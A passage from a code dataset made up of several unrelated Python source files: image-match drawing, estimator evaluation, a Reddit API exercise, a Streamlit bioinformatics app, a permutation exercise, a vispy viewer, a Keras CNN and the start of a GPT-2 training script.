self.DEFAULT_PADDING\n self._back_color = self.DEFAULT_BACK_COLOR\n\n self._create_background_image()\n\n # -------- CONFIGURATION -------------------\n def set_image_size(self, size):\n \"\"\" Set the maximum size of the background image (should be a Point instance). \"\"\"\n self._image_size = size\n self._create_background_image()\n\n def set_padding(self, padding):\n \"\"\" Set the number of pixels of padding between images 1 and 2 in the background image. \"\"\"\n self._padding = padding\n self._create_background_image()\n\n def set_back_color(self, color):\n \"\"\" Set the background color. \"\"\"\n self._back_color = color\n self._create_background_image()\n\n # -------- FUNCTIONALITY -------------------\n def background_image(self):\n \"\"\" Get the background image (images 1 and 2 side-by-side) without any other markings (e.g. matches, etc.)\"\"\"\n return self._background_image.copy()\n\n def _create_background_image(self):\n \"\"\" Create the background image, which consists of the two images side-by-side with a colored backdrop.\n This must be recreated if the image size, padding, or background color changes. \"\"\"\n self._calculate_image_positions()\n\n w, h = self._calculate_background_image_size()\n image = Image.blank(w, h)\n image.paste(self._image1, self._image1_position)\n image.paste(self._image2, self._image2_position)\n\n image, factor = self._rescale_to_max_size(image)\n self._background_image = image\n self._scale_factor = factor\n\n def _calculate_image_positions(self):\n \"\"\" Determine the positions of images 1 and 2 in the background image. \"\"\"\n pad = self._padding\n w1, h1 = self._image1.size()\n w2, h2 = self._image2.size()\n\n self._image1_position = Point(pad, pad)\n self._image2_position = Point(2 * pad + w1, pad)\n\n if h2 > h1:\n self._image1_position += Point(0, pad + 0.5 * (h2 - h1))\n elif h2 > h1:\n self._image2_position += Point(0, pad + 0.5 * (h1 - h2))\n\n def _calculate_background_image_size(self):\n \"\"\" Determine the sizes of images 1 and 2 as displayed in the background image. \"\"\"\n pad = self._padding\n w1, h1 = self._image1.size()\n w2, h2 = self._image2.size()\n\n w_bg = w1 + w2 + 3 * pad\n h_bg = 2 * pad + max(h1, h2)\n return w_bg, h_bg\n\n def _rescale_to_max_size(self, image):\n \"\"\" Resize the background image so that it fills up the maximum available space. \"\"\"\n width, height = image.size()\n factor = self._image_size / max(width, height)\n rescaled = image.rescale(factor)\n return rescaled, factor\n\n def draw_transform_points(self, image1_point, image2_point, image=None):\n \"\"\" Draw a cross at a point on image 1 and the corresponding transformed point on image 2. \"\"\"\n if image is None:\n image = self._background_image.copy()\n\n if image1_point is not None:\n point1 = self._point_to_image_coords(image1_point, 1)\n image.draw_cross(point1, Color.green(), size=10, thickness=2)\n\n if image2_point is not None:\n point2 = self._point_to_image_coords(image2_point, 2)\n image.draw_cross(point2, Color.green(), size=10, thickness=2)\n\n return image\n\n def draw_transform_shapes(self, shape1, shape2, image=None):\n \"\"\" Draw a shape on image 1 and the corresponding transformed shape on image 2. \"\"\"\n if image is None:\n image = self._background_image.copy()\n\n self._draw_shape(shape1, self.IMAGE_1, image)\n self._draw_shape(shape2, self.IMAGE_2, image)\n return image\n\n def _draw_shape(self, shape, image_num, image):\n \"\"\" Draw a polygon on the specified image. \"\"\"\n if shape is not None:\n shape = self._polygon_to_image_coords(shape, image_num)\n for edge in shape.edges():\n image.draw_line(edge[0], edge[1], Color.orange(), thickness=2)\n\n def draw_matches(self, matches, highlight_matches=[], image=None):\n \"\"\" Draw lines for each of the matches between the respective points in the two images.\n Matches that are marked as included in the transformation will be colored blue whereas\n those not included will be alight grey. Highlighted matches will appear in yellow\n \"\"\"\n if image is None:\n image = self._background_image.copy()\n\n for match in matches:\n color = Color.blue() if match.is_in_transformation() else Color.slate_gray()\n self._draw_match(image, match, color, thickness=1, radius=4)\n\n for match in highlight_matches:\n self._draw_match(image, match, Color.yellow(), thickness=2, radius=4)\n color = Color.blue() if match.is_in_transformation() else Color.slate_gray()\n self._draw_match(image, match, color, thickness=1, radius=4)\n\n return image\n\n def _draw_match(self, image, match, color, thickness, radius):\n \"\"\" Draw a single match on the image pair. \"\"\"\n point1 = self._point_to_image_coords(match.image_point1(), 1)\n point2 = self._point_to_image_coords(match.image_point2(), 2)\n\n # Draw a small circle at both co-ordinates\n image.draw_circle(point1, radius, color, thickness)\n image.draw_circle(point2, radius, color, thickness)\n\n # Draw a line between the two points\n image.draw_line(point1, point2, color, thickness)\n\n def _point_to_image_coords(self, point, image_num):\n \"\"\" Convert a point on image 1 or 2 to a coordinate in the background image. \"\"\"\n image_position = self._get_image_position(image_num)\n return (point + image_position) * self._scale_factor\n\n def _polygon_to_image_coords(self, polygon, image_num):\n \"\"\" Convert a polygon on image 1 or 2 to a polygon in the background image. \"\"\"\n image_position = self._get_image_position(image_num)\n return polygon.offset(image_position).scale(self._scale_factor)\n\n def _get_image_position(self, num):\n \"\"\" Get the position of the specified image. \"\"\"\n return self._image2_position if num == self.IMAGE_2 else self._image1_position\n\n @staticmethod\n def draw_keypoints(image, keypoints):\n \"\"\" Draw the list of keypoints to the specified image and display it as a popup window. \"\"\"\n marked_image = cv2.drawKeypoints(image.raw(), keypoints, flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n return Image(marked_image)\n","sub_path":"CrystalMatch/dls_imagematch/feature/draw/matches.py","file_name":"matches.py","file_ext":"py","file_size_in_byte":7636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"525328808","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport torch\nimport pandas as pd\nimport os\n\nimport learn2predict as l2p\n# Use the device defined in learn2predict (should be the GPU with the most free memory)\ndevice = l2p.device\n\nsimDir = \"./sim_data\"\npredictor_name = \"flam\"\n\nnum_mc = 2000\n\ngam = True\nM = 10\nwdim = 10\n\ndf = pd.read_csv(os.path.join(simDir,predictor_name+\"_performance.csv\"),dtype={'scenario':np.int,'est':object,'n':np.int,'s':np.int,'mse':np.float,'se':np.float})\n\nfor n_metatrain in [100,500]:\n for s in [1,5]:\n if gam:\n Pi, Pi_opt, Pi_sched = l2p.initPi(s,s+2,wdim,M=M,gam=gam)\n rank_based = True\n else:\n Pi, Pi_opt, Pi_sched = l2p.initPi(s,s+2,wdim,gam=gam)\n rank_based = False\n\n # initialize the procedure\n T, T_opt, T_sched = l2p.initT(rank_based=rank_based,gam=gam)\n\n fn_main = './estimators/'+(('Gam' + '_m' + str(M)) if gam else ('Linear')) + '_n' + str(n_metatrain) + '_s' + str(s) + '_wdim' + str(wdim)\n iteration, loss_list = l2p.load_model(T, T_opt, T_sched, Pi, Pi_opt, Pi_sched, fn_main+'.tar', fl_backup = fn_main+'_backup.tar')\n for scenario in [1,2,3,4]:\n for n in [100,500]:\n print((\"n_metatrain:\",n_metatrain,\"s:\",s,\"scenario\",scenario,\"n\",n))\n losses = torch.zeros(num_mc)\n for i in range(num_mc):\n w = torch.tensor(pd.read_csv(os.path.join(simDir,\"flam_\"+str(scenario), \"w_n\"+str(n)+\"_s\"+str(s)+\"_mcrep\"+str(i)+\".csv\")).values,device=device,dtype=torch.float)\n y = torch.tensor(pd.read_csv(os.path.join(simDir,\"flam_\"+str(scenario), \"y_n\"+str(n)+\"_s\"+str(s)+\"_mcrep\"+str(i)+\".csv\")).values,device=device,dtype=torch.float)\n w_tilde = torch.tensor(pd.read_csv(os.path.join(simDir,\"flam_\"+str(scenario), \"w_tilde_n\"+str(n)+\"_s\"+str(s)+\"_mcrep\"+str(i)+\".csv\")).values,device=device,dtype=torch.float)\n regfun = torch.tensor(pd.read_csv(os.path.join(simDir,\"flam_\"+str(scenario), \"regfun_n\"+str(n)+\"_s\"+str(s)+\"_mcrep\"+str(i)+\".csv\")).values,device=device,dtype=torch.float)\n\n T_out = T(w_tilde,w,y).squeeze().detach()\n # T_out_neg = -T(w_tilde,w,-y).squeeze().detach()\n # T_out_sym = (T_out + T_out_neg)/2\n\n # losses[i] = ((T_out_sym - regfun.squeeze())**2).mean()\n losses[i] = ((T_out - regfun.squeeze())**2).mean()\n \n df = df.append(pd.DataFrame({\"scenario\":[np.int(scenario)],\n \"est\":[\"AMC\"+str(n_metatrain)],\n \"n\":[np.int(n)],\n \"s\":[np.int(s)],\n \"mse\":[np.float(losses.mean().cpu().numpy())],\n \"se\":[np.sqrt(np.float((losses.var()/losses.size()[0]).cpu().numpy()))]}))\n \ndf = df.sort_values(by=['s', 'scenario', 'n'])\ndf.to_csv('tables/flam_results_all.csv', index=False)\ndf.round(2).to_csv('tables/flam_results_all_rounded.csv', index=False)\n","sub_path":"eval_flam_final.py","file_name":"eval_flam_final.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"32524344","text":"#!/usr/bin/python3\n\"\"\"\nQuerie Reddit API\n\"\"\"\nimport requests\nheaders = {\"User-Agent\": \"ubuntu:hbtn:v1.0 (by /u/Tristan_001)\"}\n\n\ndef recurse(subreddit, hot_list=[], after=None):\n url = \"https://www.reddit.com/r/{}/hot.json?after={}\"\\\n .format(subreddit, after)\n request = requests.get(url, headers=headers, allow_redirects=False)\n\n if request.status_code == 200:\n for children in request.json().get(\"data\").get(\"children\"):\n hot_list.append(children.get(\"data\").get(\"title\"))\n\n after = request.json().get(\"data\").get(\"after\")\n if not after:\n return hot_list\n return recurse(subreddit, hot_list, after)\n\n else:\n return None\n","sub_path":"0x16-api_advanced/2-recurse.py","file_name":"2-recurse.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"419989742","text":"import streamlit as st\r\nimport streamlit.components.v1 as components\r\nimport matplotlib.pyplot as plt \r\nimport matplotlib\r\nmatplotlib.use(\"Agg\")\r\nfrom Bio.Seq import Seq \r\nfrom Bio import SeqIO\r\nfrom collections import Counter\r\nimport neatbio.sequtils as utils\r\nimport numpy as np \r\nfrom PIL import Image \r\nimport requests as req\r\nfrom stmol import component_3dmol\r\nimport kinetics\r\nimport pubchempy as pcp\r\nfrom pubchempy import get_compounds, Compound\r\n\r\n\r\ndef delta(x,y):\r\n return 0 if x == y else 1\r\n\r\n\r\ndef M(seq1,seq2,i,j,k):\r\n return sum(delta(x,y) for x,y in zip(seq1[i:i+k],seq2[j:j+k]))\r\n\r\n\r\ndef makeMatrix(seq1,seq2,k):\r\n n = len(seq1)\r\n m = len(seq2)\r\n return [[M(seq1,seq2,i,j,k) for j in range(m-k+1)] for i in range(n-k+1)]\r\n\r\n\r\ndef plotMatrix(M,t, seq1, seq2, nonblank = chr(0x25A0), blank = ' '):\r\n print(' |' + seq2)\r\n print('-'*(2 + len(seq2)))\r\n for label,row in zip(seq1,M):\r\n line = ''.join(nonblank if s < t else blank for s in row)\r\n print(label + '|' + line)\r\n\r\n\r\ndef dotplot(seq1,seq2,k = 1,t = 1):\r\n M = makeMatrix(seq1,seq2,k)\r\n plotMatrix(M, t, seq1,seq2) #experiment with character choice\r\n\r\n\r\n# Convert to Fxn\r\ndef dotplotx(seq1,seq2):\r\n plt.imshow(np.array(makeMatrix(seq1,seq2,1)))\r\n # on x-axis list all sequences of seq 2\r\n xt=plt.xticks(np.arange(len(list(seq2))),list(seq2))\r\n # on y-axis list all sequences of seq 1\r\n yt=plt.yticks(np.arange(len(list(seq1))),list(seq1))\r\n plt.show()\r\n\r\n\r\ndef gc_content(seq):\r\n result = float(str(seq).count('G') + str(seq).count('C'))/len(seq) * 100\r\n return result\r\n\r\ndef at_content(seq):\r\n result = float(str(seq).count('A') + str(seq).count('T'))/len(seq) * 100\r\n return result\r\n\r\n\r\n\r\ndef main():\r\n st.title(\"Bioinformatics App\")\r\n st.set_option('deprecation.showfileUploaderEncoding', False)\r\n\r\n activity = ['Intro','SequenceAnalysis','DotPlot','ProteinSearch',\"MoleculeVisualizer\", \"ChemicalSearch\"]\r\n choice = st.sidebar.selectbox(\"Select Activity\",activity)\r\n if choice == 'Intro':\r\n st.subheader(\"Intro\")\r\n st.write(\"\"\" This is a bioinformatics web app made with Python and Streamlit. Use the left panel dropdown to choose the various features to use.\"\"\")\r\n image = Image.open(\"overviewpicture.png\")\r\n st.image(image, use_column_width=True)\r\n\r\n elif choice == \"SequenceAnalysis\":\r\n st.subheader(\"DNA Sequence Analysis\")\r\n\r\n seq_file = st.file_uploader(\"Upload FASTA File\",type=[\"fasta\",\"fa\"])\r\n\r\n if seq_file is not None:\r\n dna_record = SeqIO.read(seq_file,\"fasta\")\r\n # st.write(dna_record)\r\n dna_seq = dna_record.seq\r\n\r\n details = st.radio(\"Details\",(\"Description\",\"Sequence\"))\r\n if details == \"Description\":\r\n st.write(dna_record.description)\r\n elif details == \"Sequence\":\r\n st.write(dna_record.seq)\r\n\r\n\r\n # Nucleotide Frequencies\r\n st.subheader(\"Nucleotide Frequency\")\r\n dna_freq = Counter(dna_seq)\r\n st.write(dna_freq)\r\n adenine_color = st.beta_color_picker(\"Adenine Color\")\r\n thymine_color = st.beta_color_picker(\"thymine Color\")\r\n guanine_color = st.beta_color_picker(\"Guanine Color\")\r\n cytosil_color = st.beta_color_picker(\"cytosil Color\")\r\n\r\n if st.button(\"Plot Freq\"):\r\n barlist = plt.bar(dna_freq.keys(),dna_freq.values())\r\n barlist[2].set_color(adenine_color)\r\n barlist[3].set_color(thymine_color)\r\n barlist[1].set_color(guanine_color)\r\n barlist[0].set_color(cytosil_color)\r\n\r\n st.pyplot()\r\n\r\n st.subheader(\"DNA Composition\")\r\n gc_score = utils.gc_content(str(dna_seq))\r\n at_score = utils.at_content(str(dna_seq))\r\n st.json({\"GC Content\":gc_score,\"AT Content\":at_score})\r\n\r\n # Nucleotide Count\r\n nt_count = st.text_input(\"Enter Nucleotide Here\",\"Type Nucleotide Alphabet\")\r\n st.write(\"Number of {} Nucleotide is ::{}\".format((nt_count),str(dna_seq).count(nt_count)))\r\n\r\n # Protein Synthesis\r\n st.subheader(\"Protein Synthesis\")\r\n p1 = dna_seq.translate()\r\n aa_freq = Counter(str(p1))\r\n\r\n if st.checkbox(\"Transcription\"):\r\n st.write(dna_seq.transcribe())\r\n\r\n elif st.checkbox(\"Translation\"):\r\n st.write(dna_seq.translate())\r\n\r\n elif st.checkbox(\"Complement\"):\r\n st.write(dna_seq.complement())\r\n\r\n elif st.checkbox(\"AA Frequency\"):\r\n st.write(aa_freq)\r\n\r\n elif st.checkbox(\"Plot AA Frequency\"):\r\n aa_color = st.beta_color_picker(\"Pick An Amino Acid Color\")\r\n # barlist = plt.bar(aa_freq.keys(),aa_freq.values(),color=aa_color)\r\n # barlist[2].set_color(aa_color)\r\n plt.bar(aa_freq.keys(),aa_freq.values(),color=aa_color)\r\n st.pyplot()\r\n\r\n elif st.checkbox(\"Full Amino Acid Name\"):\r\n aa_name = str(p1).replace(\"*\",\"\")\r\n aa3 = utils.convert_1to3(aa_name)\r\n st.write(aa_name)\r\n st.write(\"=====================\")\r\n st.write(aa3)\r\n\r\n st.write(\"=====================\")\r\n st.write(utils.get_acid_name(aa3))\r\n \r\n elif choice == \"ProteinSearch\":\r\n st.subheader(\"Search for Papers Related to a Protein\")\r\n st.write(\"\"\" Try entering ACE2 and coronavirus!\"\"\")\r\n\r\n ace2 = st.text_input(\"Query Protein\")\r\n disease = st.text_input(\"Query Specifier (more specific thing to narrow down papers with)\")\r\n\r\n if ace2 and disease is not None:\r\n protein = req.get('https://www.ebi.ac.uk/proteins/api/proteins?offset=0&size=10&gene='+ace2+'&organism=homo%20sapiens', headers = {'Accept':\"application/json\"})\r\n for i,v in enumerate(protein.json()[0]['references']):\r\n counter = 1\r\n try:\r\n title = protein.json()[0]['references'][i]['citation']['title']\r\n if counter ==10:\r\n break\r\n \r\n if title.find(disease) != -1:\r\n st.write(title)\r\n counter +=1\r\n except:\r\n pass\r\n \r\n elif choice == \"DotPlot\":\r\n st.subheader(\"Generate Dot Plot For Two Sequences\")\r\n seq_file1 = st.file_uploader(\"Upload 1st FASTA File\",type=[\"fasta\",\"fa\"])\r\n seq_file2 = st.file_uploader(\"Upload 2nd FASTA File\",type=[\"fasta\",\"fa\"])\r\n\r\n if seq_file1 and seq_file2 is not None:\r\n dna_record1 = SeqIO.read(seq_file1,\"fasta\")\r\n dna_record2 = SeqIO.read(seq_file2,\"fasta\")\r\n # st.write(dna_record)\r\n dna_seq1 = dna_record1.seq\r\n dna_seq2 = dna_record2.seq\r\n\r\n details = st.radio(\"Details\",(\"Description\",\"Sequence\"))\r\n if details == \"Description\":\r\n st.write(dna_record1.description)\r\n st.write(\"=====================\")\r\n st.write(dna_record2.description)\r\n elif details == \"Sequence\":\r\n st.write(dna_record1.seq)\r\n st.write(\"=====================\")\r\n st.write(dna_record2.seq)\r\n\r\n\r\n cus_limit = st.number_input(\"Select Max number of Nucleotide\",10,200,50)\r\n if st.button(\"Dot Plot\"):\r\n st.write(\"Comparing the first {} Nucleotide of the Two Sequences\".format(cus_limit))\r\n dotplotx(dna_seq1[0:cus_limit],dna_seq2[0:cus_limit])\r\n\r\n st.pyplot()\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n elif choice == \"MoleculeVisualizer\":\r\n st.subheader(\"Look at a molecule! Pre-loaded example is the Covid-19 Spike Protein. Thank you to: https://github.com/napoles-uach/streamlit_3dmol\")\r\n\r\n component_3dmol()\r\n \r\n elif choice == \"ChemicalSearch\":\r\n st.title(\"Search for chemicals and get info. Pre-loaded example: imatinib\")\r\n user_compound = st.text_input(\"Enter compound name\", 'imatinib')\r\n if user_compound is not None:\r\n results = pcp.get_compounds(user_compound,'name')\r\n for compound in results:\r\n st.write('Compound ID: '+ str(compound.cid))\r\n st.write('SMILES: '+compound.isomeric_smiles)\r\n \r\n vioxx = Compound.from_cid(compound.cid)\r\n st.write('Molecular Formula: '+vioxx.molecular_formula)\r\n st.write('Molecular Weight: '+str(vioxx.molecular_weight))\r\n st.write('IUPAC Name: '+vioxx.iupac_name)\r\n st.write('xlogp value: '+str(vioxx.xlogp))\r\n \r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"penguins-app.py","file_name":"penguins-app.py","file_ext":"py","file_size_in_byte":8912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"611128281","text":"\n\"\"\"\nProblem Statement\nGiven a string, write a function that uses recursion to output a list of all the possible permutations of that string.\n\nFor example, given s='abc' the function should return ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']\n\nNote: If a character is repeated, treat each occurence as distinct, for example an input of 'xxx' would return a list with 6 \"versions\" of 'xxx'\n\n\"\"\"\ndef permute(s):\n \n out = []\n \n #base case\n if len(s) == 1:\n out = [s]\n \n else: \n for i,letter in enumerate(s): \n for perm in permute(s[:i] + s[i+1:]):\n out += [letter+perm]\n \n return out\n\n\n\"\"\"\niterations:\n1. abc @ a permute(bc) # ab because s[:i] + s[i+1:] of abc at a is bc\n bc @ b permute(c)\n returns c # cos len = 1\n out = b+c\n out += a + bc #(['abc'])\n \n bc @ c permute(b)\n returns b # cos len = 1\n out += [cb]\n out += a + cb #(['abc','acb'])\n\n\n2. abc @ b permute(ac) # ab because s[:i] + s[i+1:] of abc at b is ac\n ac @ a permute(c) #hitting c here, because s[:i] + s[i+1:] of ac at a is c.\n returns c # cos len = 1\n out = a+c\n out += b + ac #(['abc','acb','bac'])\n\n ac @ c permute(a) #hitting a here because because s[:i] + s[i+1:] of ac at c is a. (s[i+1: would be null])\n returns a # cos len = 1\n out = c + a\n out += b + ca #(['abc','acb','bac','bca'])\n\n3. abc @ c permute(ab) # ab because s[:i] + s[i+1:] of abc at c is ab\n ab @ a permute(b) # hitting b here because s[:i] + s[i+1:] of ab at a is b\n returns b # cos len = 1\n out = a + b\n out += c + ab #(['abc','acb','bac','bca','cab'])\n\n ab @ b permute(a) # hitting a here because s[:i] + s[i+1:] of ab at b is a\n returns a # cos len = 1\n out = b + a\n out += c + ba #(['abc','acb','bac','bca'])\n\n\n\n\"\"\"\n\n\nprint(permute(\"abc\"))","sub_path":"basic/permutate.py","file_name":"permutate.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"362278948","text":"# -----------------------------------------------------------------------------\n# Copyright (c) 2015-2018, The dartpy development contributors\n# All Rights Reserved.\n# Distributed under the BSD 2-Clause License. See LICENSE for more info.\n# -----------------------------------------------------------------------------\n\nfrom vispy import app\nfrom vispy import scene\n\nfrom dart.gui.vispy.world_node import WorldNode\n\n\nclass Viewer(scene.SceneCanvas):\n def __init__(self, world, title='Noname', show=True):\n if world is None:\n raise ValueError(\"World is None.\")\n\n super().__init__(title=title, keys='interactive', size=(800, 550), show=show)\n\n self.unfreeze()\n\n self.viewBox = self.central_widget.add_view()\n self.viewBox.bgcolor = '#efefef'\n self.viewBox.camera = 'arcball'\n self.viewBox.camera.fov = 50\n # self.viewBox.camera.distance = 1\n self.viewBox.padding = 0\n\n self.axis = scene.visuals.XYZAxis(parent=self.viewBox.scene)\n\n self.world = None\n self.worldNode = None\n\n self.freeze()\n\n self.setWorld(world)\n\n self.unfreeze()\n self.events.key_press.connect(self.on_key_press)\n\n self.timer = app.Timer('auto', self.on_timer)\n self.timer.start()\n self.freeze()\n\n def on_timer(self, _):\n self.update()\n\n def on_draw(self, event):\n self._refreshWorldNode()\n\n super().on_draw(event=event)\n\n def on_key_press(self, event):\n if event.key.name == 'S':\n self.unfreeze()\n self.show(True)\n self.freeze()\n if event.key.name == 'H':\n self.unfreeze()\n self.show(False)\n self.freeze()\n print('\\'{}\\' key pressed'.format(event.key.name))\n\n def _refreshWorldNode(self):\n if not self.worldNode:\n return\n self.worldNode.refresh()\n\n def setWorld(self, world):\n if self.world == world:\n return\n\n self.unfreeze()\n self.world = world\n self.freeze()\n\n if not self.world:\n return\n\n self.unfreeze()\n self.worldNode = WorldNode(self.world, parent=self.viewBox.scene)\n self.freeze()\n\n def getFrame(self):\n temp = self.render()\n print('getFrame()')\n return temp\n\n def startSimulation(self):\n self.unfreeze()\n self.worldNode = WorldNode(self.world, parent=self.viewBox.scene)\n self.freeze()\n","sub_path":"dart/gui/vispy/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"640270507","text":"# Make sure set in appropriate working directory\n\n# Make sure tensorflow and keras installed\n\n# Importing the Keras libraries and packages\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Flatten\nfrom keras.layers import Dense\n\n# Initialising the CNN\nclassifier = Sequential()\n\n# Convolution\nclassifier.add(Conv2D(filters = 64, kernel_size = (3, 3), activation = 'relu', input_shape = (32, 32, 1)))\n\n# Max Pooling\nclassifier.add(MaxPooling2D(pool_size = (2, 2)))\n\n# Adding more convolutional layers and max pooling\nclassifier.add(Conv2D(filters = 32, kernel_size = (2, 2), activation = 'relu'))\nclassifier.add(MaxPooling2D(pool_size = (2, 2)))\n\n# Flattening\nclassifier.add(Flatten())\n\n# Full Connection\nclassifier.add(Dense(units = 64, activation = 'relu'))\nclassifier.add(Dense(units = 46, activation = 'softmax'))\n\n# Compiling the CNN\nclassifier.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\n# Fitting the CNN to the images\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\ntest_datagen = ImageDataGenerator(rescale = 1./255)\n\n# Creating Trainig and Test sets\ntraining_set = train_datagen.flow_from_directory('Train',\n target_size = (32, 32),\n batch_size = 32,\n color_mode = 'grayscale',\n class_mode = 'categorical')\ntest_set = test_datagen.flow_from_directory('Test',\n target_size = (32, 32),\n batch_size = 32,\n color_mode = 'grayscale',\n class_mode = 'categorical')\n\n# Training the classifier\nclassifier.fit_generator(training_set,\n steps_per_epoch = 2300,\n epochs = 34,\n validation_data = test_set,\n validation_steps = 6900)","sub_path":"Classification_code.py","file_name":"Classification_code.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"6707182","text":"import transformers\nimport torch\nimport os\nimport json\nimport random\nimport numpy as np\nimport argparse\nfrom torch.utils.tensorboard import SummaryWriter\nfrom datetime import datetime, timedelta\nfrom tqdm import tqdm\nfrom torch.nn import DataParallel\nfrom tokenizations.bpe_tokenizer import get_encoder\n\ndef build_files(data_path, tokenized_data_path, num_pieces, full_tokenizer, min_length):\n with open(data_path, 'r', encoding='UTF-8') as f:\n print('Reading Lines')\n lines = json.load(f)\n # 用 [SEP] 取代換行,段落之間使用 [SEP] 表示段落結束\n lines = [line.replace('\\n', ' [SEP] ') for line in lines]\n all_len = len(lines)\n\n os.makedirs(tokenized_data_path, exist_ok=True)\n\n show = []\n for i in tqdm(range(num_pieces)):\n sublines = lines[all_len // num_pieces * i: all_len // num_pieces * (i + 1)]\n if i == num_pieces - 1:\n # 將最後一個 Example 放到最後一個 Piece\n sublines.extend(lines[all_len // num_pieces * (i + 1):])\n # 只留下長度超過 min_length 的句子\n sublines = [\n full_tokenizer.tokenize(line) for line in sublines if len(line) > min_length]\n show.append(random.choice(sublines))\n sublines = [full_tokenizer.convert_tokens_to_ids(line) for line in sublines]\n full_line = []\n for subline in sublines:\n # 使用 [MASK] 表示文章開頭\n full_line.append(full_tokenizer.convert_tokens_to_ids('[MASK]'))\n full_line.extend(subline)\n # 使用 [CLS] 表示文章結束\n full_line.append(full_tokenizer.convert_tokens_to_ids('[CLS]'))\n\n with open(tokenized_data_path + 'tokenized_train_{}.txt'.format(i), 'w') as f:\n for id in full_line:\n f.write(str(id) + ' ')\n print('Tokenized Data Sample')\n print('\\n'.join([' '.join(s) for s in show[:5]]))\n print('Building from Raw Data Done')\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--device', default='0,1,2,3', type=str, required=False, help='設定要使用的顯卡,以逗號區隔')\n parser.add_argument(\n '--model_config', type=str, required=True, help='模型參數設定檔的路徑')\n parser.add_argument('--tokenizer_path', type=str, required=True, help='選擇字典檔的路徑')\n parser.add_argument('--raw_data_path', type=str, required=True, help='訓練用語料庫的路徑')\n parser.add_argument(\n '--tokenized_data_path', default='data/tokenized/', type=str, required=False, help='語料庫 Tokenized 後的存放路徑')\n parser.add_argument('--raw', action='store_true', help='是否已做過 Tokenization')\n parser.add_argument('--epochs', default=5, type=int, required=False, help='設定 Epochs')\n parser.add_argument('--batch_size', default=8, type=int, required=False, help='設定 Batch Size')\n parser.add_argument('--lr', default=1.5e-4, type=float, required=False, help='設定 Learning Rate')\n parser.add_argument('--warmup_steps', default=2000, type=int, required=False, help='設定 Optimizer 的 Warmup Steps')\n parser.add_argument('--log_step', default=1, type=int, required=False, help='Loss 紀錄的間隔,必須是 Gradient Accumulation 的整數倍')\n parser.add_argument('--stride', default=768, type=int, required=False, help='設定訓練語料庫的窗口大小')\n parser.add_argument('--gradient_accumulation', default=1, type=int, required=False, help='梯度累積')\n parser.add_argument('--fp16', action='store_true', help='是否使用半精度浮點數')\n parser.add_argument('--fp16_opt_level', default='O1', type=str, required=False)\n parser.add_argument('--max_grad_norm', default=1.0, type=float, required=False)\n parser.add_argument('--num_pieces', default=100, type=int, required=False, help='將訓練語料庫分成多少份')\n parser.add_argument('--min_length', default=1, type=int, required=False, help='文章最短長度,若文章長度不足將被捨棄')\n parser.add_argument('--output_dir', type=str, required=True, help='模型輸出路徑')\n parser.add_argument('--pretrained_model', default='', type=str, required=False, help='模型起始路徑')\n parser.add_argument('--writer_dir', default='tensorboard_summary/', type=str, required=False, help='Tensorboard 輸出路徑')\n parser.add_argument('--segment', action='store_true', help='是否以詞為單位')\n parser.add_argument('--bpe_token', action='store_true', help='使用 Byte Pair Encoding')\n parser.add_argument('--encoder_json', default='tokenizations/encoder.json', type=str, help='encoder.json')\n parser.add_argument('--vocab_bpe', default='tokenizations/vocab.bpe', type=str, help='vocab.bpe')\n parser.add_argument('--timezone', default=8, type=int, help='手動指定時區,預設為 GMT+8')\n parser.add_argument('--epoch_save', default=1, type=int, help='每隔幾個 Epoch 就存一次權重')\n\n args = parser.parse_args()\n print(f'Arguments: {args.__repr__()}')\n\n if args.segment:\n from tokenizations import tokenization_bert_word_level as tokenization_bert\n else:\n from tokenizations import tokenization_bert\n\n # 設定要使用的顯卡\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.device\n\n model_config = transformers.modeling_gpt2.GPT2Config.from_json_file(args.model_config)\n print('Config:\\n' + model_config.to_json_string())\n\n n_ctx = model_config.n_ctx\n if args.bpe_token:\n full_tokenizer = get_encoder(args.encoder_json, args.vocab_bpe)\n else:\n full_tokenizer = tokenization_bert.BertTokenizer(vocab_file=args.tokenizer_path)\n full_tokenizer.max_len = 999999\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n print(f'Using Device: {device.upper()}')\n\n raw_data_path = args.raw_data_path\n tokenized_data_path = args.tokenized_data_path\n raw = args.raw\n epochs = args.epochs\n batch_size = args.batch_size\n lr = args.lr\n warmup_steps = args.warmup_steps\n log_step = args.log_step\n stride = args.stride\n gradient_accumulation = args.gradient_accumulation\n # 不支援半精度浮點數的顯卡不要打開\n fp16 = args.fp16\n fp16_opt_level = args.fp16_opt_level\n max_grad_norm = args.max_grad_norm\n num_pieces = args.num_pieces\n min_length = args.min_length\n output_dir = args.output_dir\n tz = args.timezone\n get_time = lambda: datetime.utcnow() + timedelta(hours=tz)\n tb_writer = SummaryWriter(log_dir=args.writer_dir)\n assert log_step % gradient_accumulation == 0\n\n os.makedirs(output_dir, exist_ok=True)\n\n if raw:\n print('Building from Raw Data')\n build_files(\n data_path=raw_data_path,\n tokenized_data_path=tokenized_data_path,\n 